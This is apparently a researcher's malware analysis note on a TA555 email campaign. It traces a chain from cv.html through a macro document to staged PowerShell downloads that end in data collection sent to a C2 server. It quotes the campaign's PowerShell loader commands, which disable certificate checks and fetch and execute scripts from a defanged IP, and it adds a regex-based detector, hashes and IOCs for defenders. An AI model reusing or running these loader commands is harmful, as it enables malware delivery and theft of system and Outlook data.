Found a new TA555 campaign spreading via email. While analysing the file, I found many code similarities and behaviours matching those described here: hxxps://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot.
I am still doing my analysis; this is a quick note so defenders can cover their part.
Hash:
MD5: a2d689af80054f2e81c297afd5f933b6
Filename: cv.html
Execution Flow:
cv.html -> drops embedded cvxxx.doc
-> Macro runs PowerShell
-> PowerShell waits 284 seconds, then downloads an additional PowerShell script served under a PNG extension (random 7-letter filename).
powershell.exe -nop Start-Sleep 284;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object System.Net.WebClient).DownloadString('hxxps://194.36[.]188[.]132/'+(-join ((97..122) | Get-Random -Count 7 | % {[char]$_}))+'.png')
xxxxxx.PNG -> Second PS script
Relaunches a hidden PowerShell process (via sysnative on WoW64, i.e. the 64-bit binary) that downloads another PowerShell script served under a JPG extension (random 9-letter filename).
$P59N3q7L5="-w 1 -sta -nop -noexit -ep bypass -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={`$true};iex (New-Object System.Net.WebClient).DownloadString('hxxps://194.36[.]188[.]132/'+(-join ((97..122) | Get-Random -Count 9 | % {[char]`$_}))+'.jpg')";if($env:PROCESSOR_ARCHITEW6432 -eq "AMD64"){$cEaleMo="$env:WINDIR\sysnative";}else{$cEaleMo="$env:WINDIR\system32";};$cEaleMo+="\windowspowershell\v1.0\powershell.exe";Start-Process $cEaleMo -arg $P59N3q7L5 -windowstyle hidden;
xxxxxx.JPG -> Third PS script
Contains two base64-encoded blobs.
The second decoded blob is a PowerShell script that performs system discovery, collects Microsoft Outlook profile details and sends them to the C2; in parallel it also checks which antivirus product is installed.
During the analysis I haven't seen any final payload dropped; the PowerShell script is actively beaconing to the C2.
However, I found remnants in the code indicating that it drops a *.exe payload in the TEMP folder.
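The chain above leaves a distinctive pattern in process command-line telemetry (Sysmon event 1 / Windows 4688): certificate validation disabled, DownloadString piped into iex, a random-letter image filename, a long Start-Sleep, and a hidden sysnative relaunch. The following is an added example of my own, not code from the campaign or from the Proofpoint write-up; it scores command lines against those indicators. The sample command lines are constructed paraphrases of the two stages, with the C2 replaced by a placeholder, and the weights and threshold are assumptions to tune against your own baseline.

```python
import re

# Constructed sample command lines (the C2 address is a placeholder).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop Start-Sleep 284;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object System.Net.WebClient).DownloadString('https://C2_PLACEHOLDER/'+(-join ((97..122) | Get-Random -Count 7 | % {[char]$_}))+'.png')",
    "C:\\Windows\\sysnative\\windowspowershell\\v1.0\\powershell.exe -w 1 -sta -nop -noexit -ep bypass -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};iex (New-Object System.Net.WebClient).DownloadString('https://C2_PLACEHOLDER/'+(-join ((97..122) | Get-Random -Count 9 | % {[char]$_}))+'.jpg')",
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",  # benign admin usage
]

# (name, weight, pattern). Weights are assumptions; strong indicators score 3,
# weak ones (common in legitimate scripts) score 1 so they only add up in combination.
INDICATORS = [
    ("cert_validation_disabled", 3, re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("download_string_to_iex", 3, re.compile(r"\biex\b.*DownloadString\(", re.I)),
    ("random_name_image_url", 3, re.compile(r"Get-Random\s+-Count\s+\d+.*\.(png|jpg|jpeg|gif)'", re.I)),
    ("sleep_before_download", 2, re.compile(r"Start-Sleep\s+\d+.*DownloadString", re.I)),
    ("exec_policy_bypass", 1, re.compile(r"-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I)),
    ("hidden_window", 1, re.compile(r"-w(indowstyle)?\s+(1|hidden)\b", re.I)),
    ("sysnative_relaunch", 1, re.compile(r"\\sysnative\\", re.I)),
    ("no_profile", 1, re.compile(r"-nop\b|-NoProfile\b", re.I)),
]


def score_command_line(cmd):
    """Return (score, [matched indicator names]) for one PowerShell command line."""
    hits = [name for name, _, pat in INDICATORS if pat.search(cmd)]
    score = sum(weight for name, weight, _ in INDICATORS if name in hits)
    return score, hits


def triage(command_lines, threshold=5):
    """Return (cmd, score, hits) for every command line at or above the threshold."""
    flagged = []
    for cmd in command_lines:
        score, hits = score_command_line(cmd)
        if score >= threshold:
            flagged.append((cmd, score, hits))
    return flagged


if __name__ == "__main__":
    for cmd, score, hits in triage(SAMPLE_COMMAND_LINES):
        print(f"score={score} hits={hits}\n  {cmd[:100]}...")
```

Feed it the CommandLine field from your process-creation logs; the benign sample scores only 1 and is not flagged, while both stages of this chain score well above the threshold.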
Metadata:
IOC - 194.36[.]188[.]132:443
Main file - cv.html: a2d689af80054f2e81c297afd5f933b6
CVxxxx.doc: EAF039445CC11684AA41652CF5BAE53D
xxxxx.PNG: A0F6A71FA67F77D04F2B59243DB9B33C (PS script)
XXXX.JPG: 995B8930FF2650EFE4D4E8204E644601 (PS script)
Tools.dll: A034C5DBB4442894E2808FF008265620
Cheers!